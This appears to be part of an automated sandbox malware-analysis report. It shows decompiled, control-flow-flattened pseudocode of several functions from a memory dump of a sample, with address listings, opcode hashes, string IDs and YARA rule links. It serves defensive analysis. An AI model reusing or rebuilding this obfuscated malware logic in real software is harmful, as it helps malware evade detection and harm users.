									if(_t431 == 0x221cfa57) {
										_t428 = _t428 + 0x2c;
										asm("sbb esi, esi");
										_t431 = (_t431 & 0x14354e49) + 0x1c1c4d3a;
										continue;
									} else {
										if(_t431 != 0x2413af03) {
											L30:
											if(_t431 != 0x1b07e5ae) {
												_t357 = _v132;
												while(1) {
													_t439 = _t431 - 0x28e290b2;
													if(_t439 > 0) {
														goto L18;
													}
													goto L3;
												}
												goto L18;
											}
										} else {
											_push(_t380);
											_push(_t380);
											_t357 = E00238736(0x20000); // executed
											_t379 = _t357;
											if(_t379 != 0) {
												_t431 = 0x2c9da08a;
												L11:
												_t357 = _v132;
												L12:
												_t380 = _v148;
												goto L1;
											}
										}
									}
								}
							}
						}
						L33:
						return _t357;
						goto L34;
						L18:
						if(_t431 == 0x2c9da08a) {
							_push(_t380);
							_push(_t380);
							_t357 = E00238736(0x2000);
							_t435 = _t357;
							if(_t357 == 0) {
								_t431 = 0x205a5796;
								goto L29;
							} else {
								_t431 = 0x28e290b2;
								goto L11;
							}
						} else {
							if(_t431 == 0x30519b83) {
								_t361 = E0023F65F(_v68, _v72, _v80, _v40,  *_t428, _a12, _v88); // executed
								_t380 = _v148;
								_t437 =  &(_t437[5]);
								_v16 = _t361;
								_t357 = _v132;
								_t413 = 0x10c975df;
								_t431 =  !=  ? 0x10c975df : 0x221cfa57;
								continue;
							} else {
								if(_t431 == 0x33392e52) {
									E00247830(_v128, _t380, _t435, _v164, _v104, _v24);
									_t437 =  &(_t437[4]);
									goto L24;
								} else {
									if(_t431 != 0x3b64c246) {
										goto L30;
									} else {
										_t431 = 0x2413af03;
										continue;
									}
								}
							}
						}
						goto L33;
					}
				}
			}

































































                                                      0x002442da
                                                      0x002442e4
                                                      0x002442eb
                                                      0x002442ef
                                                      0x002442f6
                                                      0x002442fd
                                                      0x00244304
                                                      0x00244305
                                                      0x00244306
                                                      0x0024430b
                                                      0x00244316
                                                      0x00244319
                                                      0x00244323
                                                      0x0024432e
                                                      0x00244330
                                                      0x00244338
                                                      0x0024433d
                                                      0x00244342
                                                      0x00244344
                                                      0x00244348
                                                      0x0024434d
                                                      0x00244355
                                                      0x0024435d
                                                      0x00244365
                                                      0x0024436a
                                                      0x00244372
                                                      0x0024437d
                                                      0x00244388
                                                      0x00244393
                                                      0x0024439b
                                                      0x002443a0
                                                      0x002443a8
                                                      0x002443b0
                                                      0x002443b8
                                                      0x002443c3
                                                      0x002443cb
                                                      0x002443d6
                                                      0x002443de
                                                      0x002443ed
                                                      0x002443f0
                                                      0x002443f4
                                                      0x002443fc
                                                      0x00244404
                                                      0x00244409
                                                      0x00244411
                                                      0x00244419
                                                      0x00244421
                                                      0x00244429
                                                      0x0024442e
                                                      0x00244433
                                                      0x0024443b
                                                      0x00244443
                                                      0x0024444b
                                                      0x00244453
                                                      0x0024445b
                                                      0x00244463
                                                      0x0024446e
                                                      0x00244479
                                                      0x00244484
                                                      0x00244494
                                                      0x0024449c
                                                      0x0024449f
                                                      0x002444a3
                                                      0x002444ab
                                                      0x002444b3
                                                      0x002444bb
                                                      0x002444c3
                                                      0x002444cb
                                                      0x002444d6
                                                      0x002444e1
                                                      0x002444ee
                                                      0x002444fd
                                                      0x00244500
                                                      0x00244504
                                                      0x0024450c
                                                      0x00244514
                                                      0x0024451c
                                                      0x00244524
                                                      0x0024452c
                                                      0x00244534
                                                      0x00244541
                                                      0x00244545
                                                      0x0024454d
                                                      0x00244555
                                                      0x00244568
                                                      0x0024456f
                                                      0x0024457a
                                                      0x00244582
                                                      0x00244587
                                                      0x0024458f
                                                      0x00244597
                                                      0x0024459f
                                                      0x002445af
                                                      0x002445b3
                                                      0x002445b8
                                                      0x002445c0
                                                      0x002445c8
                                                      0x002445d4
                                                      0x002445d9
                                                      0x002445df
                                                      0x002445e7
                                                      0x002445f4
                                                      0x002445f5
                                                      0x002445f9
                                                      0x00244601
                                                      0x00244609
                                                      0x00244611
                                                      0x00244616
                                                      0x0024461e
                                                      0x00244629
                                                      0x00244634
                                                      0x0024463f
                                                      0x00244647
                                                      0x0024464f
                                                      0x00244657
                                                      0x0024465f
                                                      0x00244667
                                                      0x0024466f
                                                      0x00244674
                                                      0x0024467c
                                                      0x0024468a
                                                      0x0024468e
                                                      0x00244696
                                                      0x0024469b
                                                      0x002446a3
                                                      0x002446ab
                                                      0x002446b3
                                                      0x002446bb
                                                      0x002446c3
                                                      0x002446cb
                                                      0x002446d0
                                                      0x002446d8
                                                      0x002446e0
                                                      0x002446f0
                                                      0x002446f5
                                                      0x002446fe
                                                      0x00244709
                                                      0x00244714
                                                      0x0024471f
                                                      0x0024472a
                                                      0x00244735
                                                      0x0024473d
                                                      0x00244748
                                                      0x00244750
                                                      0x00244758
                                                      0x0024475d
                                                      0x00244765
                                                      0x0024476d
                                                      0x00244778
                                                      0x00244780
                                                      0x0024478b
                                                      0x00244793
                                                      0x0024479b
                                                      0x002447a3
                                                      0x002447ab
                                                      0x002447b3
                                                      0x002447be
                                                      0x002447c9
                                                      0x002447d4
                                                      0x002447e0
                                                      0x002447e3
                                                      0x002447e7
                                                      0x002447ef
                                                      0x002447f6
                                                      0x002447fa
                                                      0x002447fa
                                                      0x002447ff
                                                      0x002447ff
                                                      0x00244805
                                                      0x00000000
                                                      0x00000000
                                                      0x0024480b
                                                      0x0024480b
                                                      0x00244939
                                                      0x0024494b
                                                      0x00244950
                                                      0x00244955
                                                      0x002449e0
                                                      0x002449e0
                                                      0x00000000
                                                      0x0024495b
                                                      0x00244966
                                                      0x0024496e
                                                      0x00244980
                                                      0x00244984
                                                      0x00244988
                                                      0x00000000
                                                      0x00244988
                                                      0x00000000
                                                      0x00244811
                                                      0x00244813
                                                      0x002448d7
                                                      0x002448fa
                                                      0x002448fd
                                                      0x00244902
                                                      0x00244a70
                                                      0x00244a70
                                                      0x00244a74
                                                      0x00000000
                                                      0x00244819
                                                      0x0024481f
                                                      0x002448a2
                                                      0x002448a9
                                                      0x00000000
                                                      0x00244821
                                                      0x00244827
                                                      0x00000000
                                                      0x00244aa3
                                                      0x00244833
                                                      0x00244877
                                                      0x0024487c
                                                      0x00244884
                                                      0x00000000
                                                      0x00244835
                                                      0x0024483b
                                                      0x00244a79
                                                      0x00244a7f
                                                      0x00244a81
                                                      0x002447ff
                                                      0x002447ff
                                                      0x00244805
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00244805
                                                      0x00000000
                                                      0x002447ff
                                                      0x00244841
                                                      0x00244850
                                                      0x00244851
                                                      0x00244857
                                                      0x0024485c
                                                      0x00244862
                                                      0x00244868
                                                      0x0024486d
                                                      0x0024486d
                                                      0x00244871
                                                      0x00244871
                                                      0x00000000
                                                      0x00244871
                                                      0x00244862
                                                      0x0024483b
                                                      0x00244833
                                                      0x0024481f
                                                      0x00244813
                                                      0x00244aae
                                                      0x00244aae
                                                      0x00000000
                                                      0x00244990
                                                      0x00244996
                                                      0x00244a4d
                                                      0x00244a4e
                                                      0x00244a54
                                                      0x00244a59
                                                      0x00244a5f
                                                      0x00244a6b
                                                      0x00000000
                                                      0x00244a61
                                                      0x00244a61
                                                      0x00000000
                                                      0x00244a61
                                                      0x0024499c
                                                      0x002449a2
                                                      0x00244a10
                                                      0x00244a15
                                                      0x00244a19
                                                      0x00244a1e
                                                      0x00244a25
                                                      0x00244a2e
                                                      0x00244a33
                                                      0x00000000
                                                      0x002449a4
                                                      0x002449aa
                                                      0x002449d8
                                                      0x002449dd
                                                      0x00000000
                                                      0x002449ac
                                                      0x002449b2
                                                      0x00000000
                                                      0x002449b8
                                                      0x002449b8
                                                      0x00000000
                                                      0x002449b8
                                                      0x002449b2
                                                      0x002449aa
                                                      0x002449a2
                                                      0x00000000
                                                      0x00244996
                                                      0x002447ff

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: +^$R.93$R.93$RESCDIR$dEH$l)
                                                      • API String ID: 0-1973027218
                                                      • Opcode ID: 6dae183150793ffe9c3d1d0d0277e954d08126b822ad90e5e8a4cc44d4105b4e
                                                      • Instruction ID: 2915dc4c776e2eeafc5de5578439d751d9c85e9b08d4b9fb612639cca2ca5e31
                                                      • Opcode Fuzzy Hash: 6dae183150793ffe9c3d1d0d0277e954d08126b822ad90e5e8a4cc44d4105b4e
                                                      • Instruction Fuzzy Hash: 980242725187819FE3A8DF24C88AA5BFBE1FBC4314F108A1DE5D996260D7B48949CF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002402C3, Relevance: 7.7, Strings: 6, Instructions: 248COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E002402C3() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _t245;
				signed int _t247;
				void* _t249;
				signed int _t254;
				void* _t255;
				intOrPtr _t256;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t290;
				void* _t293;
				void* _t298;
				signed int* _t300;

				_t300 =  &_v676;
				_v580 = 0x66ae1;
				_v576 = 0xbd1a2;
				_v572 = 0x272c23;
				_t258 = 0x33;
				_t256 = 0;
				_t293 = 0x3b419076;
				_v568 = 0;
				_v640 = 0x1372;
				_v640 = _v640 / _t258;
				_v640 = _v640 | 0x4a3401ed;
				_v640 = _v640 ^ 0x4a34016d;
				_v660 = 0x5e98;
				_v660 = _v660 >> 0xe;
				_v660 = _v660 | 0x7267fa90;
				_t259 = 0x75;
				_v660 = _v660 / _t259;
				_v660 = _v660 ^ 0x00fa5318;
				_v652 = 0x5e75;
				_v652 = _v652 << 0x10;
				_v652 = _v652 + 0x48dc;
				_t260 = 0x18;
				_v652 = _v652 / _t260;
				_v652 = _v652 ^ 0x03efb4d1;
				_v608 = 0xe223;
				_t261 = 0x3f;
				_v608 = _v608 / _t261;
				_v608 = _v608 ^ 0x000070cc;
				_v656 = 0xb48f;
				_v656 = _v656 >> 6;
				_t262 = 0x3a;
				_v656 = _v656 / _t262;
				_v656 = _v656 + 0xde3a;
				_v656 = _v656 ^ 0x0000cbaf;
				_v612 = 0x15cc;
				_v612 = _v612 ^ 0x9ca6d169;
				_v612 = _v612 ^ 0x9ca6af9c;
				_v668 = 0xa8de;
				_v668 = _v668 << 5;
				_v668 = _v668 + 0xffff49ed;
				_t263 = 0x34;
				_v668 = _v668 / _t263;
				_v668 = _v668 ^ 0x00000193;
				_v596 = 0xe25b;
				_v596 = _v596 >> 4;
				_v596 = _v596 ^ 0x000030c3;
				_v636 = 0xc7ea;
				_v636 = _v636 << 0xa;
				_v636 = _v636 | 0x82c54243;
				_v636 = _v636 ^ 0x83dfaf9b;
				_v620 = 0x2a3e;
				_v620 = _v620 + 0xffff612f;
				_v620 = _v620 ^ 0xffffe842;
				_v644 = 0x52e;
				_t264 = 0x44;
				_v644 = _v644 * 0x2b;
				_v644 = _v644 + 0x1b45;
				_v644 = _v644 ^ 0x0000a38b;
				_v664 = 0x7c05;
				_v664 = _v664 / _t264;
				_v664 = _v664 + 0xfffff3de;
				_t265 = 0xd;
				_v664 = _v664 * 0x41;
				_v664 = _v664 ^ 0xfffd1fed;
				_v672 = 0x7153;
				_v672 = _v672 * 0x55;
				_v672 = _v672 + 0xffff3073;
				_v672 = _v672 | 0x19b2f735;
				_v672 = _v672 ^ 0x19b69e67;
				_v624 = 0x6a46;
				_v624 = _v624 << 6;
				_v624 = _v624 ^ 0x001a8e62;
				_v676 = 0x6586;
				_v676 = _v676 | 0x5a6bf539;
				_v676 = _v676 / _t265;
				_v676 = _v676 << 0xf;
				_v676 = _v676 ^ 0x4e5fab63;
				_v632 = 0x1a9f;
				_v632 = _v632 + 0x62a3;
				_v632 = _v632 ^ 0x000002a8;
				_v616 = 0x8464;
				_v616 = _v616 | 0x13bf265e;
				_v616 = _v616 ^ 0x13bfdd6d;
				_v592 = 0xbadb;
				_t266 = 0x3d;
				_t292 = _v632;
				_v592 = _v592 * 0x69;
				_v592 = _v592 ^ 0x004cce95;
				_v604 = 0xca90;
				_v604 = _v604 >> 0xc;
				_v604 = _v604 ^ 0x00007684;
				_v648 = 0x358b;
				_v648 = _v648 << 1;
				_v648 = _v648 << 9;
				_v648 = _v648 / _t266;
				_v648 = _v648 ^ 0x0003f328;
				_v600 = 0xe7dd;
				_v600 = _v600 ^ 0xaf509c9e;
				_v600 = _v600 ^ 0xaf5010b9;
				_v628 = 0xd224;
				_t245 = _v628;
				_t267 = 0x19;
				_t290 = _t245 % _t267;
				_v628 = _t245 / _t267;
				_v628 = _v628 ^ 0x00000864;
				do {
					while(_t293 != 0x47bbe06) {
						if(_t293 == 0xa25cde4) {
							_t249 = E0023F46D();
							_t298 = _v588 - _v548;
							asm("sbb ecx, [esp+0x94]");
							__eflags = _v584 - _t290;
							if(__eflags >= 0) {
								if(__eflags > 0) {
									L19:
									_t256 = 1;
									__eflags = 1;
								} else {
									__eflags = _t298 - _t249;
									if(_t298 >= _t249) {
										goto L19;
									}
								}
							}
						} else {
							if(_t293 == 0x13363d5d) {
								_t290 = _v604;
								_t267 = _v592;
								E0024AAAE(_t267, _t290, _v648,  &_v588, _v600);
								_t300 =  &(_t300[3]);
								_t293 = 0xa25cde4;
								continue;
							} else {
								if(_t293 == 0x1fdc46de) {
									_t290 = _v660;
									_t254 = E0023B566(_t267, _t290, _v656, _v612, _v640, _v668, _t267, _v596, _v636, _t256, _v620, _v644, _v628,  &_v524); // executed
									_t292 = _t254;
									_t300 =  &(_t300[0xc]);
									__eflags = _t254 - 0xffffffff;
									if(__eflags != 0) {
										_t293 = 0x47bbe06;
										continue;
									}
								} else {
									if(_t293 == 0x350fffd6) {
										_t290 =  &_v524;
										_t255 = E00243E3F(_t267, _t290, __eflags, _v652, _v608);
										_pop(_t267);
										__eflags = _t255;
										if(__eflags != 0) {
											_t293 = 0x1fdc46de;
											continue;
										}
									} else {
										if(_t293 != 0x3b419076) {
											goto L14;
										} else {
											_t293 = 0x350fffd6;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t256;
					}
					_push(_t267);
					_t247 = E00237F83( &_v564, _v664, _v672, _v624, _t292, _t267, _v676);
					_t290 = _v616;
					_t267 = _v632;
					asm("sbb esi, esi");
					_t293 = ( ~_t247 & 0xe3709c53) + 0x2fc5a10a; // executed
					__eflags = _t293;
					E00244F7D(_t267, _t290, _t292); // executed
					_t300 =  &(_t300[7]);
					L14:
					__eflags = _t293 - 0x2fc5a10a;
				} while (__eflags != 0);
				goto L20;
			}






















































                                                      0x002402c3
                                                      0x002402c9
                                                      0x002402d3
                                                      0x002402db
                                                      0x002402e9
                                                      0x002402ea
                                                      0x002402ec
                                                      0x002402f1
                                                      0x002402f5
                                                      0x00240305
                                                      0x0024030b
                                                      0x00240313
                                                      0x0024031b
                                                      0x00240323
                                                      0x00240328
                                                      0x00240334
                                                      0x00240339
                                                      0x0024033f
                                                      0x00240347
                                                      0x0024034f
                                                      0x00240354
                                                      0x00240360
                                                      0x00240365
                                                      0x0024036b
                                                      0x00240373
                                                      0x0024037f
                                                      0x00240384
                                                      0x0024038a
                                                      0x00240392
                                                      0x0024039a
                                                      0x002403a3
                                                      0x002403a8
                                                      0x002403ae
                                                      0x002403b6
                                                      0x002403be
                                                      0x002403c6
                                                      0x002403ce
                                                      0x002403d6
                                                      0x002403de
                                                      0x002403e3
                                                      0x002403ef
                                                      0x002403f2
                                                      0x002403f6
                                                      0x002403fe
                                                      0x00240406
                                                      0x0024040b
                                                      0x00240413
                                                      0x0024041b
                                                      0x00240420
                                                      0x00240428
                                                      0x00240430
                                                      0x00240438
                                                      0x00240440
                                                      0x00240448
                                                      0x00240459
                                                      0x00240461
                                                      0x00240465
                                                      0x0024046d
                                                      0x00240475
                                                      0x00240485
                                                      0x00240489
                                                      0x00240496
                                                      0x00240499
                                                      0x0024049d
                                                      0x002404a5
                                                      0x002404b2
                                                      0x002404b6
                                                      0x002404be
                                                      0x002404c6
                                                      0x002404ce
                                                      0x002404d6
                                                      0x002404db
                                                      0x002404e3
                                                      0x002404eb
                                                      0x002404fb
                                                      0x002404ff
                                                      0x00240504
                                                      0x0024050c
                                                      0x00240514
                                                      0x0024051c
                                                      0x00240524
                                                      0x0024052c
                                                      0x00240534
                                                      0x0024053c
                                                      0x00240549
                                                      0x0024054c
                                                      0x00240550
                                                      0x00240554
                                                      0x0024055c
                                                      0x00240564
                                                      0x00240569
                                                      0x00240571
                                                      0x00240579
                                                      0x0024057d
                                                      0x0024058a
                                                      0x0024058e
                                                      0x00240596
                                                      0x0024059e
                                                      0x002405a6
                                                      0x002405ae
                                                      0x002405b6
                                                      0x002405ba
                                                      0x002405bb
                                                      0x002405bd
                                                      0x002405c1
                                                      0x002405c9
                                                      0x002405c9
                                                      0x002405d7
                                                      0x002406f4
                                                      0x002406fd
                                                      0x00240708
                                                      0x0024070f
                                                      0x00240711
                                                      0x00240713
                                                      0x00240719
                                                      0x0024071b
                                                      0x0024071b
                                                      0x00240715
                                                      0x00240715
                                                      0x00240717
                                                      0x00000000
                                                      0x00000000
                                                      0x00240717
                                                      0x00240713
                                                      0x002405dd
                                                      0x002405e3
                                                      0x0024068a
                                                      0x0024068e
                                                      0x00240692
                                                      0x00240697
                                                      0x0024069a
                                                      0x00000000
                                                      0x002405e9
                                                      0x002405ef
                                                      0x0024065f
                                                      0x00240663
                                                      0x00240668
                                                      0x0024066a
                                                      0x0024066d
                                                      0x00240670
                                                      0x00240676
                                                      0x00000000
                                                      0x00240676
                                                      0x002405f1
                                                      0x002405f7
                                                      0x00240610
                                                      0x0024061b
                                                      0x00240621
                                                      0x00240622
                                                      0x00240624
                                                      0x0024062a
                                                      0x00000000
                                                      0x0024062a
                                                      0x002405f9
                                                      0x002405ff
                                                      0x00000000
                                                      0x00240605
                                                      0x00240605
                                                      0x00000000
                                                      0x00240605
                                                      0x002405ff
                                                      0x002405f7
                                                      0x002405ef
                                                      0x002405e3
                                                      0x0024071f
                                                      0x00240728
                                                      0x00240728
                                                      0x002406a4
                                                      0x002406be
                                                      0x002406c3
                                                      0x002406c9
                                                      0x002406d0
                                                      0x002406d8
                                                      0x002406d8
                                                      0x002406de
                                                      0x002406e3
                                                      0x002406e6
                                                      0x002406e6
                                                      0x002406e6
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #,'$#$Fj$Sq$[$u^
                                                      • API String ID: 0-3347335214
                                                      • Opcode ID: c47c2e617af9f90d504ce4957d9b81ea9ce1d44935f169193b34d947923a3a8b
                                                      • Instruction ID: f82053fcdca83c1f7aaa8d7c4eec6ba2f78566a670e4129313a4909c3cb049fd
                                                      • Opcode Fuzzy Hash: c47c2e617af9f90d504ce4957d9b81ea9ce1d44935f169193b34d947923a3a8b
                                                      • Instruction Fuzzy Hash: DEB153725183819FE358CF64C88940BFBE2FBC4758F108A1DF1865A2A0D7B59A59CF83
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0023EE78, Relevance: 5.2, Strings: 4, Instructions: 203COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 95%
                                                      			E0023EE78() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				void* _t204;
				void* _t216;
				void* _t218;
				intOrPtr _t242;
				intOrPtr _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int* _t257;

				_t257 =  &_v1124;
				_v1056 = 0x181c5d;
				_v1052 = 0x367784;
				_t216 = 0x1144238d;
				_v1048 = 0x4ffcf6;
				_t248 = 0;
				_v1044 = 0;
				_v1088 = 0xda27;
				_t249 = 0x62;
				_v1088 = _v1088 * 0x3a;
				_t250 = 0x7a;
				_v1088 = _v1088 / _t249;
				_v1088 = _v1088 ^ 0x0000d2a1;
				_v1112 = 0x1719;
				_v1112 = _v1112 << 7;
				_v1112 = _v1112 + 0xffff2bf1;
				_v1112 = _v1112 | 0x98c770ba;
				_v1112 = _v1112 ^ 0x98cfba04;
				_v1096 = 0xeee5;
				_v1096 = _v1096 ^ 0xe08a058d;
				_v1096 = _v1096 | 0xf31efd60;
				_v1096 = _v1096 >> 0xd;
				_v1096 = _v1096 ^ 0x00079e87;
				_v1068 = 0x925f;
				_v1068 = _v1068 + 0xa627;
				_v1068 = _v1068 * 0xc;
				_v1068 = _v1068 ^ 0x000ee055;
				_v1076 = 0x1457;
				_v1076 = _v1076 * 0x3c;
				_t251 = 0x32;
				_v1076 = _v1076 / _t250;
				_v1076 = _v1076 ^ 0x00007f2a;
				_v1064 = 0x70c;
				_v1064 = _v1064 * 3;
				_v1064 = _v1064 ^ 0x000033a7;
				_v1080 = 0xbf13;
				_v1080 = _v1080 >> 0xf;
				_v1080 = _v1080 | 0xa6e1d279;
				_v1080 = _v1080 ^ 0xa6e18774;
				_v1072 = 0x855;
				_v1072 = _v1072 >> 6;
				_v1072 = _v1072 * 0x6d;
				_v1072 = _v1072 ^ 0x00004ced;
				_v1060 = 0x8e6f;
				_v1060 = _v1060 + 0xe76;
				_v1060 = _v1060 ^ 0x0000eeed;
				_v1116 = 0x7f13;
				_v1116 = _v1116 + 0x7bf9;
				_v1116 = _v1116 + 0xffffe522;
				_v1116 = _v1116 + 0x76b9;
				_v1116 = _v1116 ^ 0x000120a7;
				_v1124 = 0x4a8d;
				_v1124 = _v1124 + 0xb0fa;
				_t252 = 0x18;
				_v1124 = _v1124 / _t251;
				_v1124 = _v1124 ^ 0xe1689f92;
				_v1124 = _v1124 ^ 0xe168b829;
				_v1104 = 0x6fdc;
				_v1104 = _v1104 / _t252;
				_v1104 = _v1104 ^ 0xd1a01b12;
				_v1104 = _v1104 >> 0xd;
				_v1104 = _v1104 ^ 0x0006b7bc;
				_v1120 = 0x3441;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 | 0xb521b1d3;
				_v1120 = _v1120 ^ 0x6f352f49;
				_v1120 = _v1120 ^ 0xda14a570;
				_v1092 = 0xdaef;
				_v1092 = _v1092 + 0xffffef8f;
				_v1092 = _v1092 | 0x558b4159;
				_v1092 = _v1092 >> 0xb;
				_v1092 = _v1092 ^ 0x000a96bc;
				_v1084 = 0x9e65;
				_v1084 = _v1084 ^ 0xd37ef8f9;
				_t253 = 0x14;
				_v1084 = _v1084 / _t253;
				_v1084 = _v1084 ^ 0x0a9307fe;
				_v1100 = 0x36e3;
				_v1100 = _v1100 + 0xffff4219;
				_v1100 = _v1100 | 0x679c7357;
				_t254 = 0x3e;
				_v1100 = _v1100 * 0x7e;
				_v1100 = _v1100 ^ 0xffbf63c1;
				_v1108 = 0x25e;
				_v1108 = _v1108 / _t254;
				_v1108 = _v1108 | 0x82073b90;
				_v1108 = _v1108 * 0x30;
				_v1108 = _v1108 ^ 0x615b4461;
				do {
					while(_t216 != 0x295ca1) {
						if(_t216 == 0x1144238d) {
							_t216 = 0x274f9b22;
							continue;
						} else {
							if(_t216 == 0x1718f041) {
								E0023C0C6(_v1092, _v1084,  &_v1040, _v1100, _v1108); // executed
							} else {
								if(_t216 == 0x274f9b22) {
									E00243E3F(_t216,  &_v520, __eflags, _v1088, _v1112);
									_t216 = 0x295ca1;
									continue;
								} else {
									_t264 = _t216 - 0x3691f983;
									if(_t216 != 0x3691f983) {
										goto L10;
									} else {
										_push( &_v1040);
										_push( &_v520);
										E00237B63(_v1104, _v1120, _t264);
										_t248 =  !=  ? 1 : _t248;
										_t216 = 0x1718f041;
										continue;
									}
								}
							}
						}
						L13:
						return _t248;
					}
					_push(_v1068);
					_t204 = E0024889D(0x24c9b0, _v1096, __eflags);
					_pop(_t218);
					_t242 =  *0x24ca2c; // 0x698300
					_t176 = _t242 + 0x230; // 0x7a0043
					E0023C680(_t176, _v1064, _v1080, _t218, _v1072,  *0x24ca2c, _t204,  &_v1040);
					E00242025(_v1060, _t204, _v1116, _v1124);
					_t257 =  &(_t257[9]);
					_t216 = 0x3691f983;
					L10:
					__eflags = _t216 - 0x16e30c37;
				} while (__eflags != 0);
				goto L13;
			}






































                                                      0x0023ee78
                                                      0x0023ee7e
                                                      0x0023ee88
                                                      0x0023ee90
                                                      0x0023ee95
                                                      0x0023eea1
                                                      0x0023eea3
                                                      0x0023eea7
                                                      0x0023eeb6
                                                      0x0023eeb9
                                                      0x0023eec3
                                                      0x0023eec4
                                                      0x0023eeca
                                                      0x0023eed2
                                                      0x0023eeda
                                                      0x0023eedf
                                                      0x0023eee7
                                                      0x0023eeef
                                                      0x0023eef7
                                                      0x0023eeff
                                                      0x0023ef07
                                                      0x0023ef0f
                                                      0x0023ef14
                                                      0x0023ef1c
                                                      0x0023ef24
                                                      0x0023ef33
                                                      0x0023ef37
                                                      0x0023ef3f
                                                      0x0023ef4c
                                                      0x0023ef56
                                                      0x0023ef57
                                                      0x0023ef5d
                                                      0x0023ef65
                                                      0x0023ef74
                                                      0x0023ef78
                                                      0x0023ef80
                                                      0x0023ef88
                                                      0x0023ef8d
                                                      0x0023ef95
                                                      0x0023ef9d
                                                      0x0023efa5
                                                      0x0023efaf
                                                      0x0023efb3
                                                      0x0023efbb
                                                      0x0023efc3
                                                      0x0023efcb
                                                      0x0023efd3
                                                      0x0023efdb
                                                      0x0023efe3
                                                      0x0023efeb
                                                      0x0023eff3
                                                      0x0023effb
                                                      0x0023f003
                                                      0x0023f011
                                                      0x0023f012
                                                      0x0023f016
                                                      0x0023f01e
                                                      0x0023f028
                                                      0x0023f038
                                                      0x0023f03e
                                                      0x0023f04b
                                                      0x0023f055
                                                      0x0023f05d
                                                      0x0023f065
                                                      0x0023f06a
                                                      0x0023f072
                                                      0x0023f07a
                                                      0x0023f082
                                                      0x0023f08a
                                                      0x0023f092
                                                      0x0023f09a
                                                      0x0023f09f
                                                      0x0023f0a7
                                                      0x0023f0af
                                                      0x0023f0bb
                                                      0x0023f0c0
                                                      0x0023f0c6
                                                      0x0023f0ce
                                                      0x0023f0d6
                                                      0x0023f0de
                                                      0x0023f0eb
                                                      0x0023f0ec
                                                      0x0023f0f0
                                                      0x0023f0f8
                                                      0x0023f106
                                                      0x0023f10a
                                                      0x0023f117
                                                      0x0023f11b
                                                      0x0023f123
                                                      0x0023f123
                                                      0x0023f12d
                                                      0x0023f190
                                                      0x00000000
                                                      0x0023f12f
                                                      0x0023f135
                                                      0x0023f215
                                                      0x0023f13b
                                                      0x0023f13d
                                                      0x0023f185
                                                      0x0023f18c
                                                      0x00000000
                                                      0x0023f13f
                                                      0x0023f13f
                                                      0x0023f145
                                                      0x00000000
                                                      0x0023f14b
                                                      0x0023f157
                                                      0x0023f15f
                                                      0x0023f160
                                                      0x0023f16c
                                                      0x0023f16f
                                                      0x00000000
                                                      0x0023f16f
                                                      0x0023f145
                                                      0x0023f13d
                                                      0x0023f135
                                                      0x0023f21d
                                                      0x0023f229
                                                      0x0023f229
                                                      0x0023f194
                                                      0x0023f1a1
                                                      0x0023f1a6
                                                      0x0023f1c2
                                                      0x0023f1cc
                                                      0x0023f1d2
                                                      0x0023f1e5
                                                      0x0023f1ea
                                                      0x0023f1ed
                                                      0x0023f1f2
                                                      0x0023f1f2
                                                      0x0023f1f2
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I/5o$aD[a$6$L
                                                      • API String ID: 0-1330720659
                                                      • Opcode ID: aa7f7d47efb36781e9dd6983fc65c55bd4f6dde0006c4e698a03cff8df4d7e47
                                                      • Instruction ID: 2ef0a91d5a3fb8927a85014ae927d1be3af4e63ecd67e72e2ca2b4789b7b0513
                                                      • Opcode Fuzzy Hash: aa7f7d47efb36781e9dd6983fc65c55bd4f6dde0006c4e698a03cff8df4d7e47
